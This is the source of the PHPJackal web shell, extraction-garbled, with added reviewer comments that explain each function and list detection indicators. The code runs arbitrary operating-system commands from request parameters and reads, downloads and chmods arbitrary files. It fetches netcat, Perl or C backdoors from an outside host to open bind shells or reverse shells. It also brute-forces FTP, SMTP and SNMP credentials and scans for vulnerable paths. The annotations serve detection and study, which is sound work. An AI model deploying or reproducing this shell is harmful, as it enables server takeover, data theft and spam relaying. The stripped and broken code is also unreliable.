Php Jackal


    // NOTE(review): this excerpt opens inside a function whose start is not shown. The visible
    // tail opens a UDP socket to $ip:$port, writes one NUL byte and returns 1 when the
    // one-byte read took at least $timeout seconds, otherwise 0.
    // After it come fallback definitions of is_executable(), file_get_contents() and
    // file_put_contents() for runtimes that lack them.
    elseif(function_exists('socket_set_timeout')){$scan=fsockopen("udp://$ip",$port);if($scan){socket_set_timeout($scan,$timeout);fwrite($scan,"\x00");$s=time();fread($scan,1);

    if((time()-$s)>=$timeout){fclose($scan);return 1;}}}return 0;}if(!function_exists('is_executable')){function is_executable($addr){return 0;}}if(!function_exists('file_get_contents')){function file_get_contents($addr){

    $a=fopen($addr,'r');$tmp=fread($a,filesize($a));fclose($a);if($a)return $tmp;else return null;}}if(!function_exists('file_put_contents')){function file_put_contents($addr,$con){$a=fopen($addr,'w');if(!$a)return 0;$t=fwrite($a,$con);fclose($a);if($t)return strlen($con);

    // file_add_contentS() appends $con to $addr. The statements after it are request handlers
    // that act on raw $_REQUEST values; no authentication or path validation is visible here:
    //   chmoD + modE -> chmod() on a caller-named path
    //   downloaD     -> returns the contents of a caller-named file as an attachment
    //   imagE        -> returns the contents of a caller-named file with an image content type
    // Detection: the mixed-case parameter names (chmoD, modE, downloaD, imagE) are distinctive
    // strings to search for in web server access logs and in files under the web root.
    return 0;}}function file_add_contentS($addr,$con){$a=fopen($addr,'a');if(!$a)return 0;fwrite($a,$con);fclose($a);return strlen($con);}if(!empty($_REQUEST['chmoD']) && !empty($_REQUEST['modE']))chmod($_REQUEST['chmoD'],'0'.$_REQUEST['modE']);

    if(!empty($_REQUEST['downloaD'])){ob_clean();$dl=$_REQUEST['downloaD'];$con=file_get_contents($dl);header('Content-type: application/octet-stream');header("Content-disposition: attachment; filename=\"$dl\";");header('Content-length: '.strlen($con));echo $con;exit;}if(!empty($_REQUEST['imagE'])){$img=$_REQUEST['imagE'];header('Content-type: imagE/gif');

    header("Content-length: ".filesize($img));header("Last-Modified: ".date('r',filemtime($img)));echo file_get_contents($img);


    // The leading exit closes the imagE handler. The exT handler then lists the functions of
    // a caller-named PHP extension via get_extension_funcs() and tags those present in
    // $disablefunctions as DISABLED (that array is defined outside this excerpt). The
    // extension name is HTML-escaped before output.
    // NOTE(review): the markup inside the echo strings appears to have been lost in
    // extraction, and one identifier is split across a line break below.
    // showsizE($size) formats a byte count as B, KB, MB or GB; $windows is 1 when
    // php_uname() starts with WIN.
    exit;}if(!empty($_REQUEST['exT'])){$ex=$_REQUEST['exT'];$e=get_extension_funcs($ex);echo ''.htmlspecialchars($ex).'Functions:
    ';foreach($e as $k=>$f){$i=$k+1;echo "$i)$f ";if(in_array($f,$disabl

    efunctions))echo 'DISABLED';echo '
    ';}echo '';exit;}function showsizE($size){if($size>=1073741824)$size=round(($size/1073741824),2).' GB';elseif($size>=1048576)$size=round(($size/1048576),2).' MB';elseif($size>=1024)$size=round(($size/1024),2).' KB';else $size.=' B';return $size;}$windows=(substr((strtoupper(php_uname())),0,3)=='WIN')?1:0;

    // UI strings and the self-identification banner of the tool. Static indicators visible
    // here that can be used for file-content detection: the name PHPJackal, the version
    // value 1.9, the author handle NetJackal and the listed website host.
    // checkfunctioN($func) returns 1 when $func exists, is callable and is not listed in
    // $disablefunctions; with $safemode ON it returns 0 for the six command-execution
    // functions in $safe.
    // NOTE(review): $et is not assigned in the visible text and $hcwd/$t are empty strings,
    // presumably because their markup was stripped during extraction.
    $errorbox="Error: ";$v='1.9';$cwd=getcwd();$msgbox="
    ";$intro="Script:
    ".str_repeat('-=-',25)."
    Name: PHPJackal
    Version: $v

    Author:
    ".str_repeat('-=-',25)."
    Name: NetJackal
    Country: Iran
    Website: http://netjackal.by.ru/
    Email: [email protected]
    ".str_repeat('-=-',25)."
    Error: Enable JavaScript in your browser!!

    !$et";$footer="${msgbox}PHPJackal v$v - Powered By NetJackal$et";$hcwd="";$t="";$crack="Dictionary:Dictionary type:Simple (P)Combo (U:P)Username:Server:Log $hcwd $et";function checkfunctioN($func){global $disablefunctions,$safemode;$safe=array('passthru','system','exec','shell_exec','popen','proc_open');

    if($safemode=='ON' && in_array($func,$safe))return 0;elseif(function_exists($func) && is_callable($func) && !in_array($func,$disablefunctions))return 1;


    // The leading return closes checkfunctioN().
    // whereistmP() returns the first directory that exists and is writable, tried in the order
    // /tmp, /usr/tmp, /var/tmp, USERPROFILE, ALLUSERSPROFILE, session.save_path,
    // upload_tmp_dir, TMP or TEMP, and falls back to the current directory.
    // shelL($command) runs an operating-system command through the first mechanism that
    // checkfunctioN() reports as usable (passthru, system, exec, shell_exec, popen,
    // proc_open), then falls back to win_shell_execute, win32_create_service, the ffi
    // extension, a WScript.Shell COM object and the perl extension.
    // Hardening note: listing only some of these in disable_functions leaves the remaining
    // branches reachable.
    // NOTE(review): one call name is split across a line break inside shelL below.
    return 0;}function whereistmP(){$uploadtmp=ini_get('upload_tmp_dir');$uf=getenv('USERPROFILE');$af=getenv('ALLUSERSPROFILE');$se=ini_get('session.save_path');

    $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';if(is_dir($uf) && is_writable($uf))return $uf;if(is_dir($af) && is_writable($af))return $af;if(is_dir($se) && is_writable($se))return $se;if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;return '.';}function shelL($command){

    global $windows;$exec=$output='';$dep[]=array('pipe','r');$dep[]=array('pipe','w');if(checkfunctioN('passthru')){ob_start();passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}elseif(checkfunctioN('system')){$tmp=ob_get_contents();ob_clean();system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}elseif(checkfunctioN('exec')){exec($command,$output);$output=join("\n",$output);$exec=$output;}elseif(checkfunctioN('shell_exec'))$exec=shell_exec($command);elseif(checkfunctioN('popen')){$output=popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}elseif(checkfunctioN('proc_open')){$res=proc_open($command,$dep,$pipes);while(!f

    eof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}elseif(checkfunctioN('win_shell_execute'))$exec=winshelL($command);elseif(checkfunctioN('win32_create_service'))$exec=srvshelL($command);elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command);elseif(is_object($ws=new COM('WScript.Shell')))$exec=comshelL($command,$ws);elseif(extension_loaded('perl'))$exec=perlshelL($command);return $exec;}function getiT($get){$fo=strtolower(ini_get('allow_url_fopen'));$ui=strtolower(ini_get('allow_url_include'));

    // getiT($get) fetches a URL with file_get_contents() or include() depending on
    // allow_url_fopen / allow_url_include, else with a hand-built HTTP/1.0 GET over
    // fsockopen() that carries a fixed Konqueror User-Agent and a Referer equal to the host.
    // NOTE(review): both conditions look like they lost an operator in extraction, and a
    // header name is split across the next line break.
    // Detection: outbound HTTP/1.0 requests from the web server with that fixed User-Agent.
    if($fo $fo=='on')$con=file_get_contents($get);elseif($ui $ui=='on'){ob_start();include($get);$con=ob_get_contents();ob_end_clean();}else{$u=parse_url($get);$host=$u['host'];$file=(empty($u['path']))?'/':$u['path'];$port=(empty($u['port']))?80:$u['port'];$url=fsockopen($host,$port,$en,$es,12);fputs($url,"GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nRefere

    r: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");$tmp=$con='';


    // Tail of getiT(): skips the HTTP response headers, then reads the body into $con.
    // downloadiT($get,$put) writes the fetched body to $put and returns 1 on success, else 0.
    // winshelL, ffishelL and srvshelL are the Windows fallbacks called from shelL(): each
    // runs cmd.exe with output redirected to a file in the whereistmP() directory named by
    // uniqid with the prefix NJ, reads that file back and deletes it. srvshelL does so by
    // creating, starting, stopping and deleting a service whose name also starts with NJ.
    // comshelL uses the WScript.Shell object passed in by the caller; perlshelL evaluates
    // system() through the perl extension.
    // Detection: short-lived NJ-prefixed files in temp directories, NJ-prefixed service
    // create and delete events, and cmd.exe started by the web server account.
    // smtpchecK() begins on the last line: it connects to port 25 and returns -1 when the
    // connection fails.
    while($tmp!="\r\n")$tmp=fgets($url);while(!feof($url))$con.=fgets($url);}return $con;}function downloadiT($get,$put){$con=getiT($get);

    $mk=file_put_contents($put,$con);if($mk)return 1;return 0;}function winshelL($command){$name=whereistmP()."\\".uniqid('NJ');win_shell_execute('cmd.exe','',"/C $command >\"$name\"");sleep(1);$exec=file_get_contents($name);unlink($name);return $exec;}

    function ffishelL($command){$name=whereistmP()."\\".uniqid('NJ');$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);while(!file_exists($name))sleep(1);$exec=file_get_contents($name);unlink($name);return $exec;}function srvshelL($command){$name=whereistmP()."\\".uniqid('NJ');$n=uniqid('NJ');$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['Com

    Spec'];win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));win32_start_service($n);win32_stop_service($n);win32_delete_service($n);while(!file_exists($name))sleep(1);$exec=file_get_contents($name);unlink($name);return $exec;}function comshelL($command,$ws){

    $exec=$ws->exec("cmd.exe /c $command");$so=$exec->StdOut();return $so->ReadAll();}function perlshelL($command){$perl=new perl();ob_start();$perl->eval("system('$command')");$exec=ob_get_contents();ob_end_clean();return $exec;}function smtpchecK($addr,$user,$pass,$timeout){

    $sock=fsockopen($addr,25,$n,$s,$timeout);if(!$sock)return -1;fread($sock,1024);


    // Continuation of smtpchecK(): sends EHLO and AUTH LOGIN with base64-encoded $user and
    // $pass and returns 1 only on a 235 reply, i.e. it tests one SMTP credential pair.
    // mysqlchecK() and mssqlchecK() return 1 when a connection with the given credentials
    // succeeds; $timeout is accepted but not used in either.
    // checksmtP($host,$timeout) walks HELO, MAIL FROM, RCPT TO and DATA and returns 1 if every
    // step is accepted, which is how the tool decides a server relays mail.
    // NOTE(review): the addresses after MAIL FROM: and RCPT TO: are empty here, presumably
    // angle-bracketed values stripped in extraction; $from is built but not used in the
    // visible text. The HELO name and the subject come from uniqid with an NJ prefix.
    // replace_stR($s,$h) applies each key => value pair of $s to $h with str_replace().
    // check_urL() starts on the last line; its body follows.
    fputs($sock,'ehlo '.uniqid('NJ')."\r\n");$res=substr(fgets($sock,512),0,1);if($res!='2')return 0;fgets($sock,512);fgets($sock,512);fgets($sock,512);fputs($sock,"AUTH LOGIN\r\n");$res=substr(fgets($sock,512),0,3);if($res!='334')return 0;

    fputs($sock,base64_encode($user)."\r\n");$res=substr(fgets($sock,512),0,3);if($res!='334')return 0;fputs($sock,base64_encode($pass)."\r\n");$res=substr(fgets($sock,512),0,3);if($res!='235')return 0;return 1;}function mysqlchecK($host,$user,$pass,$timeout){if(function_exists('mysql_connect')){$l=mysql_connect($host,$user,$pass);if($l)return 1;

    }return 0;}function mssqlchecK($host,$user,$pass,$timeout){if(function_exists('mssql_connect')){$l=mssql_connect($host,$user,$pass);if($l)return 1;}return 0;}function checksmtP($host,$timeout){$from=strtolower(uniqid('nj')).'@'.strtolower(uniqid('nj')).'.com';$sock=fsockopen($host,25,$n,$s,$timeout);

    if(!$sock)return -1;$res=substr(fgets($sock,512),0,3);if($res!='220')return 0;fputs($sock,'HELO '.uniqid('NJ')."\r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;fputs($sock,"MAIL FROM: \r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;fputs($sock,"RCPT TO: \r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;

    fputs($sock,"DATA\r\n");$res=substr(fgets($sock,512),0,3);if($res!='354')return 0;fputs($sock,"From: ".uniqid('NJ')." ".uniqid('NJ')." \r\nSubject: ".uniqid('NJ')."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".uniqid('Hello ',true)."\r\n.\r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;return 1;}function replace_stR($s,$h){$ret=$h;foreach($s as $k=>$r)$ret=str_replace($k,$r,$ret);

    return $ret;}function check_urL($url,$method,$search='200',$timeout=3){


    // Body of check_urL($url,$method,$search,$timeout): sends a GET or POST over a raw socket
    // and returns 1 if the first response line contains 200 (when $search is 200) or if any
    // response line contains $search; any other method returns 0.
    // get_sw_namE() requests a random NJ-prefixed path on port 80 and returns the text after
    // the first space of the Server header line, -1 if no such header is seen, 0 if the
    // connection fails.
    // snmpchecK() sends a hand-assembled SNMP packet carrying community string $com to UDP
    // port 161 and returns 1 on any non-empty reply.
    // The trailing top-level statements compute $safemode and, when it is ON, call
    // ini_restore() on safe_mode and open_basedir.
    // NOTE(review): the $safemode expression appears to have lost an operator in extraction,
    // and one chr call is split across a line break.
    // Detection: HTTP/1.0 requests for a path of NJ followed by hex characters, sent with no
    // headers at all, match the banner probe above.
    $u=parse_url($url);$method=strtoupper($method);$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];$data=(!empty($u['query']))?$u['query']:'';if(!empty($data))$data="?$data";$sock=fsockopen($host,$port,$en,$es,$timeout);

    if($sock){fputs($sock,"$method $file$data HTTP/1.0\r\n");fputs($sock,"Host: $host\r\n");if($method=='GET')fputs($sock,"\r\n");elseif($method=='POST')fputs($sock,'Content-Type: application/x-www-form-urlencoded\r\nContent-length: '.strlen($data)."\r\nAccept-Encoding: text\r\nConnection:close\r\n\r\n$data");else return 0;if($search=='200')if(strstr(fgets($sock),'200')){fclose($sock);return 1;}else{fclose($sock);return 0;}while(!feof($sock)){$res=fgets($sock);

    if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}}fclose($sock);}return 0;}function get_sw_namE($host,$timeout){$sock=fsockopen($host,80,$en,$es,$timeout);if($sock){$page=uniqid('NJ');fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");while(!feof($sock)){$con=fgets($sock);

    if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}}fclose($sock);return -1;}return 0;}function snmpchecK($ip,$com,$timeout){$res=0;$n=chr(0x00);$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01).chr(0x00).chr(0x04).chr(strlen($com)).$com.chr(0xA0).chr(0x19).chr(0x02).chr(0x01).chr(0x01).chr(0x02).chr(0x01).$n.chr(0x02).chr(0x01).$n.chr(0x30).chr(0x0E).chr(0x30).chr(0x0C).chr(0x06).chr

    (0x08).chr(0x2B).chr(0x06).chr(0x01).chr(0x02).chr(0x01).chr(0x01).chr(0x01).$n.chr(0x05).$n;$sock=fsockopen("udp://$ip",161);if(function_exists('socket_set_timeout'))socket_set_timeout($sock,$timeout);fputs($sock,$packet);socket_set_timeout($sock,$timeout);$res=fgets($sock);fclose($sock);if($res != '')return 1;else return 0;}$safemode=(ini_get('safe_mode') strtolower(ini_get('safe_mode'))=='on')?'ON':'OFF';if($safemode=='ON'){ini_restore('safe_mode');ini_restore('open_basedir');}

    // brshelL(): handler behind the bind-shell and reverse-shell forms. This first line only
    // declares the globals it uses and defaults $_REQUEST[C] to 0; the body continues below.
    function brshelL(){global $errorbox,$windows,$et,$hcwd;$_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0;


    // Continuation of brshelL(). Reads port, or rport and ip, from $_REQUEST, downloads a
    // helper from the hard-coded $addr base URL into the directory chosen by whereistmP()
    // under an NJ_ prefixed name (dot-prefixed on non-Windows hosts, attrib +H on Windows)
    // and runs it through shelL(), either listening on the given port or connecting out to
    // the given ip and port. On non-Windows hosts the C variant is compiled with gcc first.
    // Detection: outbound HTTP from the web server to the host in $addr, hidden NJ_ files in
    // temp directories, and gcc, perl or a new listening socket started by the web server
    // account.
    // Mitigation pointers: egress filtering for the web server and a temp directory mounted
    // without execute permission interfere with the download-and-run steps shown here.
    $addr='http://netjackal.by.ru/br';$error="$errorbox Can not make backdoor file, go to writeable folder.$et";$n=uniqid('NJ_');if(!$windows)$n=".$n";$d=whereistmP();$name=$d.DIRECTORY_SEPARATOR.$n;$c=($_REQUEST['C'])?1:0;

    if(!empty($_REQUEST['port']) && ($_REQUEST['port']=1)){$port=(int)$_REQUEST['port'];if($windows){if($c){$name.='.exe';$bd=downloadiT("$addr/nc",$name);shelL("attrib +H $name");if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe");}else{$name=$name.'.pl';$bd=downloadiT("$addr/winbind.p",$name);

    shelL("attrib +H $name");if(!$bd)echo $error;else shelL("perl $name $port");}}else{if($c){$bd=downloadiT("$addr/bind.c",$name);if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &");}else{$bd=downloadiT("$addr/bind.p",$name);if(!$bd)echo $error;else shelL("cd $d;perl $n $port &");echo "Backdoor is waiting for you on $port.
    ";

    }}}elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']=1) && !empty($_REQUEST['ip'])){$ip=$_REQUEST['ip'];$port=(int)$_REQUEST['rport'];if($windows){if($c){$name.='.exe';$bd=downloadiT("$addr/nc",$name);shelL("attrib +H $name");

    if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe");}else{$name=$name.'.pl';$bd=downloadiT("$addr/winrc.p",$name);shelL("attrib +H $name");if (!$bd)echo $error;else shelL("perl.exe $name $ip $port");}}else{if($c){$bd=downloadiT("$addr/rc.c",$name);if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &");

    }else{$bd=downloadiT("$addr/rc.p",$name);if(!$bd)echo $error;else shelL("cd $d;perl $n $ip $port &");


    // End of brshelL(): prints Done! at the end of the reverse-shell branch; when neither
    // port nor rport was supplied it renders the bind-shell and reverse-shell forms instead
    // (their markup is lost in this extraction).
    // showimagE($img) only echoes a string, which is empty here.
    // editoR($file) reports whether $file is readable and writeable and prints its contents
    // HTML-escaped; the surrounding form markup is missing from this extraction.
    }}echo 'Done!';}else{echo "Bind shell:Port:

    Type:PERL";if($windows)echo 'EXE';else echo 'C';echo"$hcwd$etReverse shell:IP:Port:Type:PERL";if($windows)echo 'EXE';else echo 'C';echo"$hcwd$et$et";}}function showimagE($img){echo "";}function editoR($file){global $errorbox,$et,$hcwd,$cwd;if(is_file($file)){if(!is_readable($file)){echo "$errorbox File is not readable$et
    ";}

    if(!is_writeable($file)){echo "$errorbox File is not writeable$et
    ";}$data=file_get_contents($file);echo "$hcwd$et
    ";echo htmlspecialchars($data);echo "";

    }else {echo "$hcwd$et
    ";}echo "$hcwd$et";}

    // webshelL(): command-execution page. This line opens the function and the Windows
    // branch that selects the list of canned command labels; the body continues below.
    function webshelL(){global $windows,$hcwd,$et,$cwd;if($windows){


    // Continuation of webshelL(): $alias holds the labels of canned commands offered to the
    // operator (different sets for Windows and non-Windows hosts, plus cPanel and mail-spool
    // entries when those paths exist); the commands themselves are not present in this
    // extraction. The value of $_REQUEST[cmd] is passed unmodified to shelL(), i.e. executed
    // as an operating-system command, and the output is echoed.
    // maileR() sends one message with mail() using to, from, subject and body taken from
    // $_REQUEST; from is placed directly into the From header.
    // Detection: requests carrying a cmd parameter to an unexpected PHP file, child processes
    // of the web server that enumerate users, processes or world-writable paths, and
    // outbound mail generated by the web server account.
    $alias="Display open portsList of processesSystem informationIP configurationGet MAC addressServices listMachines in domainUserslistTurn off the server";}

    else{$alias="Display open portsShow last 250 logged in usersDownloadersFind world-writable directoriesFind world-writable directories(in current directory)Find world-writable filesFind world-writable files(in current directory)Find files with SUID bit setFind files with SGID bit setFind .htpasswd filesFind .bash_history filesView syslog.confView hostsList of processes";if(is_dir('/etc/valiases'))$alias.="List ofcPanel`s domains(valiases)";if(is_dir('/etc/vdomainaliases'))$alias.="List cPanel`s domains(vdomainaliases)";if(file_exists('/var/cpanel/accounting.log'))$alias.="Display cPanel`s log";if(is_dir('/var/spool/mail/'))$alias.="Mailboxes list";}echo "Location:$et
    Web Shell:";if(!empty($_REQUEST['cmd']))echo shelL($_REQUEST['cmd']);echo"$hcwd$alias$hcwd$et";

    }function maileR(){global $msgbox,$et,$hcwd;if(!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){$to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body'];if(mail($to,$subject,$body,"From: $from"))echo "$msgboxMail sent!
    $et";}echo "
    Mailer:SMTP".ini_get('SMTP').' ('.ini_get('smtp_port').")From:$hcwdTo:


    r='#666666'>Subject:Body:$et";

    // The leading brace closes maileR().
    // scanneR(): port-scan handler. $host is set to the server address or 127.0.0.1; the scan
    // branch runs when the udp/tcp selection and target, fromport, toport, timeout and
    // portscanner are all present in $_REQUEST. Port bounds and timeout are cast to int and
    // the target is HTML-escaped before being echoed.
    // NOTE(review): the loop header is truncated in this extraction and the scan body is
    // missing; the $udp/$tcp test also appears to have lost an operator.
    // Detection: many short-lived outbound connections from the web server to sequential
    // ports on one target.
    }function scanneR(){global $hcwd,$et;if(!empty($_SERVER['SERVER_ADDR']))$host=$_SERVER['SERVER_ADDR'];else $host='127.0.0.1';$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;if(($udp$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport'])&& !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){$target=$_REQUEST['target'];$from=(int)$_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu=0;echo 'Port scanning started against '.htmlspecialchars($target)

    .':
    ';$start=time();for($i=$from;$i


    // Fragment of the network scanner; the start of the enclosing code is missing from this
    // extraction, so $ip, $port, $timeout and $file are defined outside the visible text.
    // Per target $ip it (1) probes the comma-separated ports with checkthisporT() and labels
    // open ones via getservbyport(), (2) when httpbanner is set, reports the Server header
    // obtained by get_sw_namE(), and (3) when httpscanner is set and port 80 answers, walks
    // the entries of $file: each non-comment line is split into fields and its path template
    // is expanded with the @CGIDIRS, @ADMINDIRS, @USERS and @NUKE placeholder lists before
    // being requested with check_urL(); a hit prints field 4 and the URL.
    // NOTE(review): the field layout of $file is not shown here; one path literal is split
    // across a line break and one condition has lost an operator in extraction.
    // Detection: bursts of HTTP/1.0 requests for many CGI and admin paths against one host.
    if(strstr($port,','))$p=explode(',',$port);else $p[0]=$port;$open=$ser='';foreach($p as $po){$scan=checkthisporT($ip,$po,$timeout);if($scan){$ser='';if($ser=getservbyport($po,'tcp'))$ser="($ser)";

    $open.=" $po$ser ";}}if($open){echo "$ip) Open ports:$open
    ";$output=1;}

    }if(!empty($_REQUEST['httpbanner'])){$res=get_sw_namE($ip,$timeout);if($res){echo "$ip) Webserver software: ";if($res==-1)echo 'Unknow';else echo $res;

    echo '
    ';$output=1;}}if(!empty($_REQUEST['httpscanner'])){if(checkthisporT($ip,80,$timeout) && !empty($file)){$admin=array('/admin/','/adm/');$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgi

    s/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');foreach($file as $v){$vuln=array();$v=trim($v);if(!$v $v{0}=='#')continue;$v=str_replace('","','^',$v);$v=str_replace('"','',$v);$vuln=explode('^',$v);$page=$cqich=$nukech=$adminch=$userch=$vuln[1];if(strstr($page,'@CGIDIRS'))foreach($cgi as $cg){$cqich=str_replace('@CGIDIRS',$cg,$page);

    $url="http://$ip$cqich";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
    ";}}elseif(strstr($page,'@ADMINDIRS'))foreach($admin as $cg){$adminch=str_replace('@ADMINDIRS',$cg,$page);$url="http://$ip$adminch";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
    ";}}

    elseif(strstr($page,'@USERS'))foreach($users as $cg){$userch=str_replace('@USERS',$cg,$page);


    // Continuation of the scanner fragment: the remaining placeholder branches (@USERS tail,
    // @NUKE and the plain-path case), then three optional checks per target $ip:
    //   smtprelay   -> checksmtP() when port 25 is open
    //   snmpscanner -> snmpchecK() for each comma-separated community string in com
    //   ftpscanner  -> ftp_login() for each user:pass pair in userpass ([BLANK] means an
    //                  empty password); successes print the credentials and ftp_systype()
    // Mitigation pointers: non-default SNMP community strings, no open SMTP relaying, and
    // lockout or rate limiting on FTP logins make these checks come back empty.
    $url="http://$ip$userch";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
    ";}}elseif(strstr($page,'@NUKE'))foreach($nuke as $cg){

    $nukech=str_replace('@NUKE',$cg,$page);$url="http://$ip$nukech";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
    ";}}else{$url="http://$ip$page";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo "$ip)".$vuln[4]." $url
    ";}}

    }}}if(!empty($_REQUEST['smtprelay'])){if(checkthisporT($ip,25,$timeout)){$res='';$res=checksmtP($ip,$timeout);if($res==1){echo "$ip) SMTP relay found.
    ";$output=1;}}}if(!empty($_REQUEST['snmpscanner'])){if(checkthisporT($ip,161,$timeout,1)){$com=$_REQUEST['com'];

    $coms=$res='';if(strstr($com,','))$c=explode(',',$com);else $c[0]=$com;foreach($c as $v){$ret=snmpchecK($ip,$v,$timeout);if($ret)$coms.=" $v ";}if($coms!=''){echo "$ip) SNMP FOUND: $coms
    ";$output=1;}}}if(!empty($_REQUEST['ftpscanner']) && function_exists('ftp_connect')){if(checkthisporT($ip,21,$timeout)){$usps=explode(',',$_REQUEST['userpass']);

    foreach($usps as $v){$user=substr($v,0,strpos($v,':'));$pass=substr($v,strpos($v,':')+1);if($pass=='[BLANK]')$pass='';$ftp=ftp_connect($ip,21,$timeout);if($ftp){if(ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) System type: ".ftp_systype($ftp)." (Connect)
    ";}}}}

    }if($output)echo '';}


    $time=time()-$start;echo "Done! ($time seconds)";if(!empty($buglist))unlink($buglist);}elseif(!empty($_REQUEST['directoryscanner'])){$dir=file($_REQUEST['dic']);$host=$_REQUEST['host'];$r=$_REQUEST['r1'];echo "Scanning started...\n";

    for($i=0;$i


    bgcolor='#808080'>Get web bannerWebserver security scanningSMTP relay checkFTP password:SNMP:$et";}}function sysinfO(){global $windows,$disablefunctions,$cwd,$safemode;$t8="";$t6="";$mil="


    $os=php_uname();$osn=php_uname('s');if(!$windows){$ker=php_uname('r');$o=($osn=='Linux')?'Linux+Kernel':$osn;$os=str_replace($osn,"${mil}$o'>$osn",$os);$os=str_replace($ker,"${mil}Linux+Kernel'>$ker",$os);

    $inpa=':';}else{$sam=$sysroot."\\system32\\config\\SAM";$inpa=';';$os=str_replace($osn,"${mil}MS+Windows'>$osn",$os);}$cuser=get_current_user();if(!$cuser)$cuser='Unknow';$software=str_replace('Apache',"${mil}Apache'>Apache",$_SERVER['SERVER_SOFTWARE']);echo "Server information:${t6

    }Server:".$_SERVER['HTTP_HOST'];if(!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "${t8}Operation system:$os$osver${t6}Web server application:$software${t8}CPU:$CPU${t6}Disk status:$disksize${t8}User domain:";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "${t6}User name:$cuser";if($windows){echo "${t8}Windows directory:$sysroot${t6}Sam file:";if(is_readable(($sam)))echo "Readable"; else echo 'Not readabl

    e';echo '';}else{echo "${t8}UID - GID:".getmyuid().' - '.getmygid()."${t6}Recommended local root exploits:$xpl${t8}Passwd file:";if(is_readable('/etc/passwd'))echo "Readable";else echo'Not readable';echo "${t6}${mil}cpanel'>cPanel:";$cp='/usr/local/cpanel/version';$cv=(file_exists($cp) && is_writable($cp))?trim(file_get_contents($cp)):'Unknow';echo "$cv (Log file: ";

    if(file_exists('/var/cpanel/accounting.log')){if(is_readable('/var/cpanel/accounting.log'))echo "Readable";else echo 'Not readable';}else echo 'Not found';echo ')';}echo "$t8${mil}PHP'>PHP version:".PHP_VERSION." (more...)${t6}Zend version:";if (function_exists('zend_version')) echo "".zend_version().'';else echo 'Not Found';echo "${t8}Include path:".str_replace($inpa,'',DEFAULT_INCLUDE_PATH)."${t6}PHP Modules:";$ext=get_loaded_extensions();foreach($ext as $v){$i=phpversion($v);if(!empty($i)

    )$i="($i)";$l=hlinK("exT=$v");echo "$v $i ";}echo "${t8}Disabled functions:";if(!empty($ds))echo "$d


